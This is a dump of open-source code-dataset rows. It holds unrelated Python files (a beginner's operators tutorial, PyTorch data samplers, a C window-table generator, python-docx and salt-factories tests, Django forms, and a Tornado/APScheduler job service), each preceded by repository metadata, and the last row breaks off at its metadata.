| no_license | Silentsoul04/FTSP_2020 | db0dae6cd9c371f3daa9219f86520dfa66348236 | 7e603af918da2bcfe4949a4cf5a33107c837894f | refs/heads/master | 2022-12-21T20:44:32.031640 | 2020-09-20T12:29:58 | 2020-09-20T12:29:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # Logical Operators in Python :-
# Identity
# Membership
Truth table
and , or , not
x y o/p
0 0 0
0 1 0
1 0 0
1 1 1
ex:-
x = 100
y = 200
print(x<y and y>x)
print(x<y and y<x)
OR Truth Table
x y o/p
0 0 0
0 1 1
1 0 1
1 1 1
Ex :-
x = 1001
y = 200
print(x<y or x>y)
x = True
print(not(x))
EX :-
x = 100
y = 200
print(x<y)
print(not(x<y))
# Identity Operator :-
is , is not
x = 100
#y = 200
y = 100
print(x is y)
print(x is y)
print(id(x))
print(id(y))
x = 100
y = 200
print(x is not y)
print(id(x))
print(id(y))
# Membership Operators :-
in , not in
l1 = [10,20,30,'Python','Surya']
print('Python' in l1)
print(1001 not in l1)
print('Apple' in l1)
| [
"[email protected]"
]
| |
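One caveat the identity examples above rely on without saying so: `x is y` being True for two separate `100` assignments is a CPython implementation detail (integers from -5 to 256 are interned), not a consequence of equal values. A sketch:

```python
a = 100
b = 100
print(a is b)          # True in CPython: small ints (-5..256) are cached

c = 100000
d = int("100000")      # built at runtime, so a distinct object
print(c == d)          # True  -- same value
print(c is d)          # False -- different objects; use == for value comparisons
```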
1db20ad25163c045f050fd3441c29eb62f9bb3d9 | 2a0055c32cb34b48fd3ef705000ce373376d5439 | /src/lib/training/scene_sampler.py | f4bdc5828e958cecb388cd84228d0eef206f8bdc | [
"MIT"
]
| permissive | pfnet-research/kaggle-lyft-motion-prediction-4th-place-solution | dc60818b96eea5181b2c923ea60cdacc02dd7187 | 0bc51075db31a747eeebb7f4775a3cd26ad5f870 | refs/heads/master | 2023-01-29T16:30:38.757836 | 2020-12-09T06:18:46 | 2020-12-09T06:18:46 | 319,860,058 | 48 | 10 | null | null | null | null | UTF-8 | Python | false | false | 3,540 | py | import math
import torch
from torch.utils.data import Sampler
import torch.distributed as dist
import numpy as np
def get_valid_starts_and_ends(get_frame_arguments: np.ndarray, min_state_index: int = 0):
get_frame_arguments = get_frame_arguments[:] # put on the memory if the array is zarr
scene_change_points = np.where(np.diff(get_frame_arguments[:, 1], 1) > 0)[0] + 1
starts = np.r_[0, scene_change_points]
ends = np.r_[scene_change_points, len(get_frame_arguments)]
valid_starts, valid_ends = [], []
while len(starts) > 0:
ok = get_frame_arguments[starts, 2] >= min_state_index
valid_starts.append(starts[ok])
valid_ends.append(ends[ok])
starts, ends = starts[~ok], ends[~ok]
starts += 1
ok = starts < ends
starts, ends = starts[ok], ends[ok]
return np.concatenate(valid_starts), np.concatenate(valid_ends)
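# Illustrative sketch (assuming column 1 holds the scene id and column 2 the
# frame's state index, as used above): for a scene-id column [0, 0, 1, 1] and a
# state-index column [0, 1, 0, 1] with min_state_index=1, each scene's start is
# advanced past its invalid frames, giving starts=[1, 3] and ends=[2, 4].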
class SceneSampler(Sampler):
def __init__(self, get_frame_arguments: np.ndarray, min_state_index: int = 0) -> None:
self.starts, self.ends = get_valid_starts_and_ends(get_frame_arguments, min_state_index)
def __len__(self) -> int:
return len(self.starts)
def __iter__(self):
indices = np.random.permutation(len(self.starts))
return iter(np.random.randint(self.starts[indices], self.ends[indices]))
class DistributedSceneSampler(Sampler):
def __init__(
self,
get_frame_arguments: np.ndarray,
min_state_index: int = 0,
num_replicas=None,
rank=None,
shuffle=True,
seed=0
) -> None:
if num_replicas is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
num_replicas = dist.get_world_size()
if rank is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
rank = dist.get_rank()
self.starts, self.ends = get_valid_starts_and_ends(get_frame_arguments, min_state_index)
self.num_replicas = num_replicas
self.rank = rank
self.epoch = 0
self.num_samples = int(math.ceil(len(self.starts) * 1.0 / self.num_replicas))
self.total_size = self.num_samples * self.num_replicas
self.shuffle = shuffle
self.seed = seed
def __iter__(self):
if self.shuffle:
# deterministically shuffle based on epoch and seed
g = torch.Generator()
g.manual_seed(self.seed + self.epoch)
indices = torch.randperm(len(self.starts), generator=g).tolist()
else:
indices = list(range(len(self.starts)))
# add extra samples to make it evenly divisible
indices += indices[:(self.total_size - len(indices))]
assert len(indices) == self.total_size
# subsample
indices = indices[self.rank:self.total_size:self.num_replicas]
assert len(indices) == self.num_samples
return iter(np.random.randint(self.starts[indices], self.ends[indices]))
def __len__(self):
return self.num_samples
def set_epoch(self, epoch):
r"""
Sets the epoch for this sampler. When :attr:`shuffle=True`, this ensures all replicas
use a different random ordering for each epoch. Otherwise, the next iteration of this
sampler will yield the same ordering.
Arguments:
epoch (int): Epoch number.
"""
self.epoch = epoch
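# Typical wiring sketch: call sampler.set_epoch(epoch) at the start of every
# training epoch so all replicas derive the same shuffled ordering from
# (seed + epoch) while the ordering still varies between epochs.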
| [
"[email protected]"
]
| |
51722ce4582e94fa2bcfb5e42f6fbbe0258d6a0f | da3b9260ee5b352c9438a43d155cebedd46e2fc9 | /emlearn/tools/window_function.py | ef59e239eb95e8de7970a2e6a2d284d740b21f6d | [
"MIT"
]
| permissive | profjefer/emlearn | 8eadde4d63f8cb2edd1d33a556039b5b08185bf2 | cc5fd962f5af601c02dfe0ec9203d1b30e6b3aef | refs/heads/master | 2023-07-15T02:36:56.072459 | 2021-08-08T09:52:00 | 2021-08-08T09:52:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,315 | py |
"""eml-window-function: Generating C code for window functions
Part of the emlearn project: https://emlearn.org
Redistributable under the MIT license
"""
import argparse
import textwrap
from .. import cgen
# Supports everything without parameters in scipy.signal.get_window
_known = 'boxcar, triang, blackman, hamming, hann, bartlett, flattop, parzen, bohman, blackmanharris, nuttall, barthann'
known_window_types = tuple(_known.split(', '))
def parse(args=None):
parser = argparse.ArgumentParser(description='Generate lookup table for window functions')
a = parser.add_argument
a('--window', type=str, default='hann',
help='Window function to use. Supported: \n' + '|'.join(known_window_types))
a('--length', type=int, default=1024,
help='Number of coefficients in window')
a('--symmetric', default=False, action='store_true',
help='Whether to use a symmetric window. Defaults to False, normal for FFT')
a('--name', type=str, default='',
help='Name of the generate C array')
a('--out', type=str, default='',
help='Output file. Default: $name.h')
a('--linewrap', type=int, default=70,
help='Maximum width of lines')
parsed = parser.parse_args(args)
return parsed
def window_function(name, window_type, length, fft_mode, linewrap):
import scipy.signal
window = scipy.signal.get_window(window_type, length, fftbins=fft_mode)
gen = cgen.array_declare(name, length, values=window)
w = textwrap.wrap(gen, linewrap)
wrapped = '\n'.join(w)
return wrapped
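# Example invocation (sketch, using the flags defined in parse() above):
#   eml-window-function --window hamming --length 512 --name hamming_512_lut
# would emit a line-wrapped C array declaration of the 512 Hamming-window
# coefficients into hamming_512_lut.h.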
def main():
args = parse()
window_type = args.window
length = args.length
fft_mode = not args.symmetric
name = args.name
out = args.out
if not name:
name = '_'.join([window_type, str(length), 'lut'])
if not out:
out = name+'.h'
if window_type not in known_window_types:
print('Warning: Unknown window type {}. Known:\n {}'.format(window_type, known_window_types))
preamble = '// This file was generated with emlearn using eml-window-function\n\n'
wrapped = window_function(name, window_type, length, fft_mode, args.linewrap)
wrapped = preamble + wrapped
with open(out, 'w') as f:
f.write(wrapped)
print('Wrote to', out)
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
4037b86353a2311197e3c0421e50369f7d041340 | 49ba5356bdc5df7dd9803b56fe507c5164a90716 | /utils.py | aab51dd8b4c7a0d60394907fa69bc482cd0d2d7e | []
| no_license | uxlsl/leetcode_practice | d80ad481c9d8ee71cce0f3c66e98446ced149635 | d8ed762d1005975f0de4f07760c9671195621c88 | refs/heads/master | 2021-04-25T18:12:28.136504 | 2020-03-11T07:54:15 | 2020-03-11T07:54:15 | 121,472,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py |
class TreeNode(object):
def __init__(self, x, left=None, right=None):
self.val = x
self.left = left
self.right = right
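# e.g. TreeNode(1, TreeNode(2), TreeNode(3)) builds a root with two leaf children.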
| [
"[email protected]"
]
| |
4cfee0890ffbe11a38b40e78c56a22069bd0b55e | 17153c0a7edfa2b69aedbf146873d38c6a92018d | /tests/test_api.py | 5f22a258b6e7cca8969209c26b4227937461551b | [
"MIT"
]
| permissive | netsyno/python-docx | 3d7c9ad23b32fea8b6676b6da1d941a18936bc07 | f181a89f1c1651baba6a37399e6bba09769459ae | refs/heads/master | 2021-01-17T21:43:50.723334 | 2016-11-09T09:08:08 | 2016-11-09T09:08:08 | 18,512,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,069 | py | # encoding: utf-8
"""
Test suite for the docx.api module
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
import pytest
from docx.api import Document
from docx.enum.text import WD_BREAK
from docx.opc.constants import CONTENT_TYPE as CT, RELATIONSHIP_TYPE as RT
from docx.package import Package
from docx.parts.document import DocumentPart, InlineShapes
from docx.parts.numbering import NumberingPart
from docx.parts.styles import StylesPart
from docx.table import Table
from docx.text import Paragraph, Run
from .unitutil import (
instance_mock, class_mock, method_mock, property_mock, var_mock
)
class DescribeDocument(object):
def it_opens_a_docx_on_construction(self, init_fixture):
docx_, open_ = init_fixture
document = Document(docx_)
open_.assert_called_once_with(docx_)
assert isinstance(document, Document)
def it_can_open_a_docx_file(self, open_fixture):
docx_, Package_, package_, document_part_ = open_fixture
document_part, package = Document._open(docx_)
Package_.open.assert_called_once_with(docx_)
        assert document_part is document_part_
assert package is package_
def it_opens_default_template_if_no_file_provided(
self, Package_, default_docx_):
Document._open(None)
Package_.open.assert_called_once_with(default_docx_)
def it_should_raise_if_not_a_Word_file(self, Package_, package_, docx_):
package_.main_document.content_type = 'foobar'
with pytest.raises(ValueError):
Document._open(docx_)
def it_can_add_a_heading(self, add_heading_fixture):
document, add_paragraph_, p_, text, level, style = add_heading_fixture
p = document.add_heading(text, level)
add_paragraph_.assert_called_once_with(text, style)
assert p is p_
def it_should_raise_on_heading_level_out_of_range(self, document):
with pytest.raises(ValueError):
document.add_heading(level=-1)
with pytest.raises(ValueError):
document.add_heading(level=10)
def it_can_add_an_empty_paragraph(self, add_empty_paragraph_fixture):
document, document_part_, p_ = add_empty_paragraph_fixture
p = document.add_paragraph()
document_part_.add_paragraph.assert_called_once_with()
assert p is p_
def it_can_add_a_paragraph_of_text(self, add_text_paragraph_fixture):
document, text, p_, r_ = add_text_paragraph_fixture
p = document.add_paragraph(text)
p.add_run.assert_called_once_with()
r_.add_text.assert_called_once_with(text)
def it_can_add_a_styled_paragraph(self, add_styled_paragraph_fixture):
document, style, p_ = add_styled_paragraph_fixture
p = document.add_paragraph(style=style)
assert p.style == style
def it_can_add_a_page_break(self, add_page_break_fixture):
document, document_part_, p_, r_ = add_page_break_fixture
p = document.add_page_break()
document_part_.add_paragraph.assert_called_once_with()
p_.add_run.assert_called_once_with()
r_.add_break.assert_called_once_with(WD_BREAK.PAGE)
assert p is p_
def it_can_add_a_picture(self, add_picture_fixture):
(document, image_path, width, height, inline_shapes_, expected_width,
expected_height, picture_) = add_picture_fixture
picture = document.add_picture(image_path, width, height)
inline_shapes_.add_picture.assert_called_once_with(image_path)
assert picture.width == expected_width
assert picture.height == expected_height
assert picture is picture_
def it_can_add_a_table(self, add_table_fixture):
document, rows, cols, style, document_part_, expected_style, table_ = (
add_table_fixture
)
table = document.add_table(rows, cols, style)
document_part_.add_table.assert_called_once_with(rows, cols)
assert table.style == expected_style
assert table == table_
def it_provides_access_to_the_document_inline_shapes(self, document):
body = document.inline_shapes
assert body is document._document_part.inline_shapes
def it_provides_access_to_the_document_paragraphs(
self, paragraphs_fixture):
document, paragraphs_ = paragraphs_fixture
paragraphs = document.paragraphs
assert paragraphs is paragraphs_
def it_provides_access_to_the_document_tables(self, tables_fixture):
document, tables_ = tables_fixture
tables = document.tables
assert tables is tables_
def it_can_save_the_package(self, save_fixture):
document, package_, file_ = save_fixture
document.save(file_)
package_.save.assert_called_once_with(file_)
def it_provides_access_to_the_numbering_part(self, num_part_get_fixture):
document, document_part_, numbering_part_ = num_part_get_fixture
numbering_part = document.numbering_part
document_part_.part_related_by.assert_called_once_with(RT.NUMBERING)
assert numbering_part is numbering_part_
def it_creates_numbering_part_on_first_access_if_not_present(
self, num_part_create_fixture):
document, NumberingPart_, document_part_, numbering_part_ = (
num_part_create_fixture
)
numbering_part = document.numbering_part
NumberingPart_.new.assert_called_once_with()
document_part_.relate_to.assert_called_once_with(
numbering_part_, RT.NUMBERING
)
assert numbering_part is numbering_part_
def it_provides_access_to_the_styles_part(self, styles_part_get_fixture):
document, document_part_, styles_part_ = styles_part_get_fixture
styles_part = document.styles_part
document_part_.part_related_by.assert_called_once_with(RT.STYLES)
assert styles_part is styles_part_
def it_creates_styles_part_on_first_access_if_not_present(
self, styles_part_create_fixture):
document, StylesPart_, document_part_, styles_part_ = (
styles_part_create_fixture
)
styles_part = document.styles_part
StylesPart_.new.assert_called_once_with()
document_part_.relate_to.assert_called_once_with(
styles_part_, RT.STYLES
)
assert styles_part is styles_part_
# fixtures -------------------------------------------------------
@pytest.fixture(params=[0, 1, 2, 5, 9])
def add_heading_fixture(self, request, document, add_paragraph_, p_):
level = request.param
text = 'Spam vs. Bacon'
style = 'Title' if level == 0 else 'Heading%d' % level
return document, add_paragraph_, p_, text, level, style
@pytest.fixture
def add_empty_paragraph_fixture(self, document, document_part_, p_):
return document, document_part_, p_
@pytest.fixture
def add_page_break_fixture(self, document, document_part_, p_, r_):
return document, document_part_, p_, r_
@pytest.fixture
def add_paragraph_(self, request, p_):
return method_mock(
request, Document, 'add_paragraph', return_value=p_
)
@pytest.fixture(params=[
(None, None, 200, 100),
(1000, 500, 1000, 500),
(2000, None, 2000, 1000),
(None, 2000, 4000, 2000),
])
def add_picture_fixture(
self, request, Document_inline_shapes_, inline_shapes_):
width, height, expected_width, expected_height = request.param
document = Document()
image_path_ = instance_mock(request, str, name='image_path_')
picture_ = inline_shapes_.add_picture.return_value
picture_.width, picture_.height = 200, 100
return (
document, image_path_, width, height, inline_shapes_,
expected_width, expected_height, picture_
)
@pytest.fixture
def add_styled_paragraph_fixture(self, document, p_):
style = 'foobaresque'
return document, style, p_
@pytest.fixture(params=[None, 'LightShading-Accent1', 'foobar'])
def add_table_fixture(self, request, document, document_part_, table_):
rows, cols = 4, 2
style = expected_style = request.param
return (
document, rows, cols, style, document_part_, expected_style,
table_
)
@pytest.fixture
def add_text_paragraph_fixture(self, document, p_, r_):
text = 'foobar\rbarfoo'
return document, text, p_, r_
@pytest.fixture
def default_docx_(self, request):
return var_mock(request, 'docx.api._default_docx_path')
@pytest.fixture
def Document_inline_shapes_(self, request, inline_shapes_):
return property_mock(
request, Document, 'inline_shapes', return_value=inline_shapes_
)
@pytest.fixture
def document(self, open_):
return Document()
@pytest.fixture
def document_part_(self, request, p_, paragraphs_, table_, tables_):
document_part_ = instance_mock(
request, DocumentPart, content_type=CT.WML_DOCUMENT_MAIN
)
document_part_.add_paragraph.return_value = p_
document_part_.add_table.return_value = table_
document_part_.paragraphs = paragraphs_
document_part_.tables = tables_
return document_part_
@pytest.fixture
def docx_(self, request):
return instance_mock(request, str)
@pytest.fixture
def init_fixture(self, docx_, open_):
return docx_, open_
@pytest.fixture
def inline_shapes_(self, request):
return instance_mock(request, InlineShapes)
@pytest.fixture
def num_part_create_fixture(
self, document, NumberingPart_, document_part_, numbering_part_):
document_part_.part_related_by.side_effect = KeyError
return document, NumberingPart_, document_part_, numbering_part_
@pytest.fixture
def num_part_get_fixture(self, document, document_part_, numbering_part_):
document_part_.part_related_by.return_value = numbering_part_
return document, document_part_, numbering_part_
@pytest.fixture
def NumberingPart_(self, request, numbering_part_):
NumberingPart_ = class_mock(request, 'docx.api.NumberingPart')
NumberingPart_.new.return_value = numbering_part_
return NumberingPart_
@pytest.fixture
def numbering_part_(self, request):
return instance_mock(request, NumberingPart)
@pytest.fixture
def open_(self, request, document_part_, package_):
return method_mock(
request, Document, '_open',
return_value=(document_part_, package_)
)
@pytest.fixture
def open_fixture(self, docx_, Package_, package_, document_part_):
return docx_, Package_, package_, document_part_
@pytest.fixture
def p_(self, request, r_):
p_ = instance_mock(request, Paragraph)
p_.add_run.return_value = r_
return p_
@pytest.fixture
def Package_(self, request, package_):
Package_ = class_mock(request, 'docx.api.Package')
Package_.open.return_value = package_
return Package_
@pytest.fixture
def package_(self, request, document_part_):
package_ = instance_mock(request, Package)
package_.main_document = document_part_
return package_
@pytest.fixture
def paragraphs_(self, request):
return instance_mock(request, list)
@pytest.fixture
def paragraphs_fixture(self, document, paragraphs_):
return document, paragraphs_
@pytest.fixture
def r_(self, request):
return instance_mock(request, Run)
@pytest.fixture
def save_fixture(self, request, open_, package_):
file_ = instance_mock(request, str)
document = Document()
return document, package_, file_
@pytest.fixture
def StylesPart_(self, request, styles_part_):
StylesPart_ = class_mock(request, 'docx.api.StylesPart')
StylesPart_.new.return_value = styles_part_
return StylesPart_
@pytest.fixture
def styles_part_(self, request):
return instance_mock(request, StylesPart)
@pytest.fixture
def styles_part_create_fixture(
self, document, StylesPart_, document_part_, styles_part_):
document_part_.part_related_by.side_effect = KeyError
return document, StylesPart_, document_part_, styles_part_
@pytest.fixture
def styles_part_get_fixture(self, document, document_part_, styles_part_):
document_part_.part_related_by.return_value = styles_part_
return document, document_part_, styles_part_
@pytest.fixture
def table_(self, request):
return instance_mock(request, Table, style=None)
@pytest.fixture
def tables_(self, request):
return instance_mock(request, list)
@pytest.fixture
def tables_fixture(self, document, tables_):
return document, tables_
| [
"[email protected]"
]
| |
7a5a5eb855c8c133eaf70cae42962096075431d4 | 2fab03dd2bc2b214a1f608e3ddb1990b052fcfd0 | /first_forms/apps/forms/forms.py | 07fa07485b8a1ed4396b54d89357f6cc1dbf3671 | []
| no_license | tlee0058/Django_FORMS | 7f7bdbbdc090f59231c8dd1e4624ff16b7a88890 | 2260b86c3d06fd2a10f867481f9e4a068997fd6a | refs/heads/master | 2020-03-09T07:59:31.055697 | 2018-04-08T21:27:35 | 2018-04-08T21:27:35 | 128,678,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from django import forms
from .models import User
class RegistrationForm(forms.Form):
first_name = forms.CharField(max_length=45)
last_name = forms.CharField(max_length=45)
email = forms.EmailField()
password = forms.CharField(max_length=100, widget=forms.PasswordInput)
confirm_password = forms.CharField(max_length=100, widget=forms.PasswordInput)
class RegisterForm(forms.ModelForm):
class Meta:
model = User
fields = '__all__' | [
"[email protected]"
]
| |
7b1f9660c366b7545b5e9bf7fe81748e3e2d5df8 | 4760a482ed52eb7f786e6987e55704fcfb33dd18 | /app.py | 15435449c61f34cd0ec135223aadbf9d16a11212 | []
| no_license | zhidu-qidian/scheduler | 18566993df81fb3b211d783aacef0c5b4268d8d6 | 08be2a10eb769ccb2da6d3de17bd19b4c029cd87 | refs/heads/master | 2021-05-15T18:41:15.254984 | 2017-10-20T08:19:31 | 2017-10-20T08:19:31 | 107,651,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,101 | py | # coding: utf-8
from datetime import datetime
import logging
import sys
from urllib import quote
from apscheduler.schedulers.tornado import TornadoScheduler
from apscheduler.jobstores.base import JobLookupError
from pymongo import MongoClient
from redis import from_url
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.web import RequestHandler
redis_url = "redis://内网地址:6379"
# redis_url = "redis://127.0.0.1:6379"
redis = from_url(redis_url, db=2, max_connections=10)
MONGODB_HOST_PORT = "<internal-address>:27017"  # placeholder for the internal network address (translated from Chinese)
MONGODB_PASSWORD = ""
COL_RULES = "timerules"
def get_mongodb_database(database, user="third"):
url = "mongodb://{0}:{1}@{2}/{3}".format(
user, quote(MONGODB_PASSWORD), MONGODB_HOST_PORT, database
)
client = MongoClient(host=url, maxPoolSize=5, minPoolSize=1)
return client.get_default_database()
def task(struct, key, value):
if struct == "set":
redis.sadd(key, value)
elif struct == "list":
redis.rpush(key, value)
def format_trigger(string):
string = string.strip()
if string[0] == "T": # interval
args = dict()
start = 1
for i, c in enumerate(string):
if c == "D":
args["days"] = int(string[start:i])
start = i+1
elif c == "H":
args["hours"] = int(string[start:i])
start = i + 1
elif c == "M":
args["minutes"] = int(string[start:i])
start = i + 1
elif c == "S":
args["seconds"] = int(string[start:i])
start = i + 1
else:
pass
return "interval", args
elif ";" in string: # cron
fields = string.strip().split(";")
args = {
"month": fields[0],
"day": fields[1],
"hour": fields[2],
"minute": fields[3],
"second": fields[4],
}
return "cron", args
else: # date
return "date", {"run_date": datetime.strptime(string, "%Y-%m-%d %H:%M:%S")}
class TaskHandler(RequestHandler):
def get(self, *args, **kwargs):
ids = self.get_arguments("id")
results = {"jobs": list()}
if ids:
for _id in ids:
job = self.application.sdr.get_job(job_id=_id)
if job:
next_time = job.next_run_time.strftime("%Y-%m-%d %H:%M:%S")
results["jobs"].append({"id": job.id, "name": job.name, "next": next_time})
else:
for job in self.application.sdr.get_jobs():
next_time = job.next_run_time.strftime("%Y-%m-%d %H:%M:%S")
results["jobs"].append({"id": job.id, "name": job.name, "next": next_time})
self.write(results)
def post(self, *args, **kwargs):
_id = self.get_argument("id")
rule = self.get_argument("rule")
key = self.get_argument("key")
value = self.get_argument("value")
struct = self.get_argument("struct")
        if not all((_id, rule, key, value, struct)):  # reject if any required param is empty
self.write({"code": 400, "message": "invalid params"})
else:
trigger, params = format_trigger(rule)
self.application.sdr.add_job(
task,
trigger=trigger,
args=[struct, key, value],
id=_id,
replace_existing=True,
**params
)
data = {"_id": _id, "rule": rule, "key": key, "value": value,
"struct": struct}
if trigger != "date":
self.store(data)
self.write({"code": 200, "message": "add job %s success" % _id})
def delete(self, *args, **kwargs):
_id = self.get_argument("id")
try:
self.application.sdr.remove_job(job_id=_id)
self.remove(_id)
self.write({"code": 200, "message": "remove job %s success" % _id})
except JobLookupError:
self.write({"code": 404, "message": "no such job:%s" % _id})
def store(self, data):
col = self.application.db[COL_RULES]
query = {"_id": data["_id"]}
if col.count(query):
col.delete_one(query)
data["time"] = datetime.now()
col.insert_one(data)
def remove(self, _id):
col = self.application.db[COL_RULES]
query = {"_id": _id}
col.delete_one(query)
class Application(web.Application):
def __init__(self):
handlers = [
("/tasks", TaskHandler),
]
defaults = {
"coalesce": True,
"max_instances": 5,
"misfire_grace_time": 120,
"replace_existing": True
}
scheduler = TornadoScheduler(job_defaults=defaults)
scheduler.start()
self.sdr = scheduler
self.db = get_mongodb_database("thirdparty", "third")
init_schedule_task(scheduler, self.db)
web.Application.__init__(self, handlers=handlers)
def init_schedule_task(scheduler, db):
col = db[COL_RULES]
rules = col.find({})
for rule in rules:
trigger, params = format_trigger(rule["rule"])
scheduler.add_job(
task,
trigger=trigger,
args=[rule["struct"], rule["key"], rule["value"]],
id=rule["_id"],
replace_existing=True,
**params
)
logging.info("add %s job rule %s" % (rule["_id"], rule["rule"]))
def main():
http_server = httpserver.HTTPServer(Application())
address = sys.argv[1]
address = address.split(":")
host = address[0]
port = address[1]
http_server.listen(port=port, address=host)
ioloop.IOLoop.instance().start()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
filename="log-app.log",
filemode="a+")
main()
| [
"[email protected]"
]
| |
ff315fba136d0af80f9ab92d97c8f7dcd05df541 | 35d16f57feae5fbb29237992590981b324bfe10b | /tests/functional/factories/daemons/test_master_factory.py | c3d1ab277613668aad13b73a7dbf685f1ef2f4b9 | [
"Apache-2.0"
]
| permissive | modamod/pytest-salt-factories | 592c477564534c196744f8445c5b62d97190af8e | 4bc885d60ec3f58d0c84283276ba1c99e6c30ba1 | refs/heads/master | 2023-02-13T15:32:34.123167 | 2021-01-19T06:15:33 | 2021-01-19T06:15:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,060 | py | import pytest
from saltfactories.utils import random_string
from saltfactories.utils import running_username
def test_keyword_basic_config_defaults(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults={"zzzz": True}
).config
assert "zzzz" in master_config
def test_interface_config_defaults(salt_factories):
interface = "172.17.0.1"
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults={"interface": interface}
).config
assert master_config["interface"] != interface
assert master_config["interface"] == "127.0.0.1"
def test_keyword_basic_config_overrides(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_overrides={"zzzz": True}
).config
assert "zzzz" in master_config
def test_interface_config_overrides(salt_factories):
interface = "172.17.0.1"
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_overrides={"interface": interface}
).config
assert master_config["interface"] != "127.0.0.1"
assert master_config["interface"] == interface
def test_keyword_simple_overrides_override_defaults(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults={"zzzz": False}, config_overrides={"zzzz": True}
).config
assert "zzzz" in master_config
assert master_config["zzzz"] is True
def test_keyword_nested_overrides_override_defaults(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"),
config_defaults={
"zzzz": False,
"user": "foobar",
"colors": {"black": True, "white": False},
},
config_overrides={"colors": {"white": True, "grey": False}},
).config
assert "zzzz" in master_config
assert master_config["zzzz"] is False
assert master_config["colors"] == {"black": True, "white": True, "grey": False}
def test_provide_root_dir(testdir, salt_factories):
root_dir = testdir.mkdir("custom-root")
config_defaults = {"root_dir": root_dir}
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults=config_defaults
).config
assert master_config["root_dir"] == root_dir
def configure_kwargs_ids(value):
return "configure_kwargs={!r}".format(value)
@pytest.mark.parametrize(
"configure_kwargs",
[{"config_defaults": {"user": "blah"}}, {"config_overrides": {"user": "blah"}}, {}],
ids=configure_kwargs_ids,
)
def test_provide_user(salt_factories, configure_kwargs):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), **configure_kwargs
).config
if not configure_kwargs:
# salt-factories injects the current username
assert master_config["user"] is not None
assert master_config["user"] == running_username()
else:
# salt-factories does not override the passed user value
assert master_config["user"] != running_username()
assert master_config["user"] == "blah"
@pytest.mark.parametrize(
"configure_kwargs",
[
{"config_defaults": None},
{"config_overrides": None},
{},
{"config_defaults": None, "config_overrides": {"user": "blah"}},
{"config_defaults": {"user": "blah"}, "config_overrides": None},
{"config_defaults": {"user": "blah"}, "config_overrides": {"user": "blah"}},
],
ids=configure_kwargs_ids,
)
def test_pytest_config(salt_factories, configure_kwargs):
master_id = random_string("master-")
config = salt_factories.get_salt_master_daemon(master_id, **configure_kwargs).config
config_key = "pytest-master"
assert config_key in config
assert "log" in config[config_key]
for key in ("host", "level", "port", "prefix"):
assert key in config[config_key]["log"]
| [
"[email protected]"
]
| |
0dbd426f8b5f12dbc8f3d582a2e24f5700f8f1b1 | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part005965.py | 190e8d7a975427451853e01e989a121bf4b152c5 | []
| no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher141996(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.3.3.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.3.3.1.0_1', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher141996._instance is None:
CommutativeMatcher141996._instance = CommutativeMatcher141996()
return CommutativeMatcher141996._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 141995
        return
        yield  # unreachable after return, but its presence makes get_match_iter a generator that yields nothing
from collections import deque
| [
"[email protected]"
]
| |
f05aad2d52815971fbc0b159d3996d831cefae17 | 2e3fd7f4d78847fbd713f521587fe39116fa34a0 | /glue/managers/simple.py | b7bf5644c754f60f1c85d25068b9074bab0f536c | [
"BSD-2-Clause"
]
| permissive | jkenlooper/glue | 24e3da4a94ec34632391f8ce93826cce3c347a57 | 8d2788fce4e23c314b2428831d34f89cdbeb2a9c | refs/heads/master | 2021-09-09T10:52:56.701113 | 2021-04-10T12:37:53 | 2021-04-10T12:37:53 | 181,468,692 | 0 | 0 | NOASSERTION | 2019-04-15T10:58:51 | 2019-04-15T10:58:51 | null | UTF-8 | Python | false | false | 330 | py | from .base import BaseManager
class SimpleManager(BaseManager):
"""Process a single folder and create one sprite. It works the
same way as :class:`~ProjectSpriteManager`, but only for one folder.
This is the default manager.
"""
def find_sprites(self):
self.add_sprite(path=self.config['source'])
| [
"[email protected]"
]
| |
c976055f913211d6c572da188dd343620dd1777c | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D11A/COLREQD11AUN.py | 43c7ae15b28a1c63211d543e79f5399cf0ce7c28 | []
